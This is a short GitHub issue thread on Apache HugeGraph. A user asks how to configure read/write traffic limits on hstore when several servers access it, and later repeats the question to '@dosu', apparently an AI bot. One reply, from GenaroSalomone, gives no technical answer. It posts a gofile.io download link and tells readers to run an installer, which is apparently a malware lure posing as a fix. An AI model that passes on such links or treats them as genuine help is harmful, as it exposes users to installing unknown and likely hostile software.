### ISSUE TITLE
[Question] How to limit the flow on hstore side ?

### ISSUE THREAD

**Issue by shirleyStorage** [apache/incubator-hugegraph#2657]
### Problem Type (问题类型)

struct / logic (架构 / 逻辑设计问题)

### Before submit

- [X] 我已经确认现有的 [Issues](https://github.com/apache/hugegraph/issues) 与 [FAQ](https://hugegraph.apache.org/docs/guides/faq/) 中没有相同 / 重复问题 (I have confirmed and searched that there are no similar problems in the historical issue and documents)

### Environment (环境信息)

- Server Version: 1.0.0 (Apache Release Version)
- Backend: RocksDB x nodes, HDD or SSD 
- OS: xx CPUs, xx G RAM, Ubuntu 2x.x / CentOS 7.x 
- Data Size:  xx vertices, xx edges 

### Your Question (问题描述)

How to limit the flow on hstore side?

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by shirleyStorage** [comment]
@dosu When multiple servers access the hstore together, is there any configuration to implement read/write traffic control on the hstore?
